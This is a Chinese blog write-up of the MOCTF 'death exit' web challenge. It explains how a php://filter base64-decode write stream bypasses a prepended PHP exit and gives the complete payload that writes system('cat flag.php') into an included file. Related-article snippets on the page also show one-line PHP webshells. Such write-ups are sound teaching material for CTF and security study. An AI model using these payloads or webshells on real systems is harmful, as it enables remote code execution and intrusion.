MOCTF-Web-死亡退出

最新推荐文章于 2024-01-27 14:15:06 发布
最新推荐文章于 2024-01-27 14:15:06 发布
阅读量396 收藏 2
点赞数 1
分类专栏: CTF刷题 文章标签: MOCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/101349394
版权

1、题目:
在这里插入图片描述
2、传送门:http://119.23.73.3:5003/
在这里插入图片描述
代码:

<?php
  show_source(__FILE__);
  $c="<?php exit;?>";   //$c=一个退出的php代码
  @$c.=$_POST['c'];     //.=详解见下方:$c=$c$_POST['c']->
  //$c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
  @$filename=$_POST['file']; 
  if(!isset($filename))                  //如果$filename不存在,执行{}里的
  {                                       
    file_put_contents('tmp.php', '');    //将空写入tmp.php
  }                                 
  @file_put_contents($filename, $c);     //将$c写入$filename
  include('tmp.php');                    //包含tmp.php文件
?>

注:
.=详解

$a.='bbb'
如果$a的值是字符串a的话
那$a的值应该是'abbb',将a加到bbb的左边
同理的操作符还有+=、-=、*=、/=

file_put_contents() 函数把一个字符串写入文件中
file_put_contents(file,data,mode,context)
在这里插入图片描述
3、代码分析:

  • 通过上传字符串变量c,变量c连接<?php exit;?>破坏掉语句结构;同时变量c也需要写入到变量filename这个文件中通过执行获得flag。

  • 这里就需要用到php://filter伪协议流来进行绕过。使用base64解码的一个漏洞(base64解码不能解码<、?、空格、?、;、>等这几个字符),然后就只会解码phpexit,但base64解码是以4个为一组进行解码的,phpexit只有7个,所以需要添加一个字符构成八个字符,才能正常解码,这里随便一个字符就行,然后再连接这里我们需要执行获取flag的命令,所以$c的pyaload为:$c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==(a后面的数值进行base64解码为<?php system('cat flag.php');?>base64加密之后的字符),最后$c的值为:<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

  • 然后就是利用php://filter伪协议了,file的payload为:file=php://filter/write=convert.base64-decode/resource=tmp.php

  • 最终的payload为:c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php

  • Payload带入源码:

<?php
  show_source(__FILE__);
  $c="<?php exit;?>";
  @$c.=$_POST['c'];   //步骤见下一行注释
  //$c=$c$_POST['c']->$c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
  @$filename=$_POST['file']; 
  //$filenmae=php://filter/write=convert.base64-decode/resource=tmp.php
  if(!isset($filename))
  {                                       
    file_put_contents('tmp.php', '');
  }                                 
  @file_put_contents($filename, $c);
  //$filename=$c=<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
  include('tmp.php');
?>

使用file=php://filter/write=convert.base64-decode/resource=tmp.php时,file的值<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==进行base64解码时,删除<、?、空格、?、;、>还剩52个字符,是phpexitaPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==,正好可以除以4,最后base64解码后为:¦{­Ú<?php system('cat flag.php');?>,现在tmp.php中是¦{­Ú<?php system('cat flag.php');?>,所以可以执行里面的代码,拿到flag

4、拿取flag
在这里插入图片描述
最查看源码,得到flag:
在这里插入图片描述

1stPeak
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
简单记录一下MOCTF的三道web
0verWatch的博客
03-06 3667
本人渣渣,于是记录一下 死亡退出 一道代码审计题目 &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
关于<?php exit;?>"的绕过问题
03-18 989
在Moctf中看到一道题目: <?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
Moctf死亡退出Write up
ChanCherry的博客
07-16 821
一开始就看到了源码,萌新表示大致看得懂什么意思,大致分析下: 第四行@c.=c.=c.=_POST[‘c’]; //@为屏蔽错误不显示在浏览器界面,POST[′c′]是以post的方式获取字符串类型的变量c,&quot;.=&quot;表示变量c会与之前变量中的&lt;?phpexit;?&gt;进行字符串连接。很显然题目需要我们以post的方式提交变量c使&amp...
死亡退出
Mikasa
03-20 567
最近做了一道非常有意思的题,感觉很有用,故记录于此: 题目来源:MOctf 这是一道代码审计题目,但是涉及的知识非常的实用: 题目如下: 发现我们可以通过POST传过去我们想执行的命令,但是前面但是有"<?php exit;?>" 这就会导致我们传过去的命令还未执行,就因为exit;的原因退出结束运行脚本了。。 试验一下: 执行一下: 去掉exit试试: 成功执行。。 但是要...
PHP代码审计(死亡退出)
qq_36609913的博客
02-13 1574
代码: &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3049
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
exit()和_exit()两个函数的区别
happylzs2008的专栏
10-27 284
https://blog.csdn.net/kang___xi/article/details/80545510 exit()和_exit()这两个函数都是用于函数退出,但这两者有一些细微的差别,在exit()函数里会调用_exit()函数。下面来看看exit()的函数代码大概: void exit(int status) { while(_exit_funcs != NULL) ...
UMCTF2021-Writeup:MOCSCTF主持的UMCTF2021的文章
03-14
感谢以下提供协助: 感谢您提供的支持: 特鲁@MOCTF 梁锦@@ MOCTF 邦@MOCTF bluebear @ MOCTF RB916120 @ MOCTF molamola @ MOCTF Allon @ MOCTF T4rn @ MOCTF P0tato @ 20级茯苓@ 20级wyjbot @ 20级Mark0519 @ 20级...
关于phpexit函数的绕过问题
https://www.cnblogs.com/zpchcbd/
04-01 2742
<?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1678
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
CTFshow元旦水友赛web部分题解
最新发布
qq_34942239的博客
01-27 1772
Chu0_write:被创建时候,chu0被赋值为xiuxiuxiu,当Chu0_write被当作字符串使用时,如果chu0和chu1相等,content则为ctfshowshowshowww和get传参的chu0拼接后字符,如果name中的“base64”个数为1或者有其他方法,将content写入name.txt,其中name用get上传。get传参show_show.show,先后进行waf1 和waf2如果绕过正则,进行反序列化。可以看到能读取到文件,读取一些配置文件无果,尝试用pear文件包含。
moctf2018新春赛misc出题及解题日志
saltyfish_yuch的博客
02-14 2408
关于moctfMOCTF平台是CodeMonster(厦门理工学院)和Mokirin(集美大学)这两支CTF战队所搭建的一个CTF在线答题系统。题目形式与各大CTF比赛相同。目的是为两个学校中热爱信息安全的同学们提供一个刷题的平台,能够一起学习、进步。0x01. 流量分析 出题思路:在路由器telnet过程中抓包获取密码。 解法:分析telnet包获取字符,拼接成flag。moctf{c@N_y0...
Jarvis-OJ WEB 多题writeup
烟敛寒林的博客
04-19 4040
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾局的秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格S...
MOCTF Web writeup (持续更新)
qq_41358038的博客
03-15 549
MOCTF-Web writeup (持续更新) 1.一道水题 查看源代码,flag在最下面 2.还是水题 按F12,选中这个文本框 将划横线部分删去,将4改为5,输入moctf,提交一下即得flag 3.访问限制 打开后显示 只允许使用NAIVE浏览器访问! 用BP抓包,send to repeater 将Firefox改为NAIVE,GO一下即可 4.机器蛇 打开之后是一个很无聊的小游戏,...
moctf-暴跳老板
烟敛寒林的博客
04-24 358
题目地址:http://119.23.73.3:5006/web1/index.php 随便提交内容,发现 抓包do.php 看到http头的提示:Dear:MyBoss,post提交postText=123&Dear=MyBoss,拿到flag。
php黑魔法-moctf
Xi4or0uji
03-18 1550
点进去看见好像少了点什么,试下访问index.php,自动跳转回上一页面,题目有php~,试下index.php~,调试看见输入两个值a,b,他们的md5想等的话就可以输出flag这里插多一句,php有个小漏洞,在处理字符串时,利用!=或==对比哈希值时,会把每一个0E开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以0E开头,那么php会认为他们是相同的。所以这里只要构造...
MOCTF新春欢乐赛-逆向writeup
杀生丸?不,其实我要的是桔梗
02-15 955
1.easyre(50) &lt;给入门小伙子看的哈&gt; 这是一个linux的运行文件。 IDA打开: 知道关键代码在getflag函数。 双击进入getflag IDA会把字符串转为16进制。 现在你需要将这些转回来。对着16进制按R 现在代码的思路就很清楚了。 创建一个字符串=“}moctf” strcat拼接acc,add,‘-’,abb 最后加上‘}’...
解题的思路与方法
qq_41708308的博客
04-08 334
开发工具与关键技术:工具:Oracle,PLSQL Developer 技术:sql 作者:范子超  撰写时间:2019-04-07   在我做题的过程中碰到了这样一道题目——查询各个部门中最高工资中最低的那个部门的 最低工资是多少。这题的意思是要查询出每个部门的最高工资里面那个最低工资的部门的最低工资是多少。   我的想法就是先通过部门分组查询出各个部门的最高工资,在给它套一层查询,过滤出工资最...
CTF技能梳理系列 ---- 文件上传
Joker_York的博客
09-02 1417
主要以CTFHub技能树里的文件上传题目为例 无验证 直接上传webshell。 <?php @eval($_GET[cmd]); ?> payload: http://url/upload/raw_shell.php?cmd=system("cat ../flag_161493477.php"); 前端验证 查看页面源码,可以看到前端的JS验证代码: <script> function checkfilesuffix() { var file=document.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值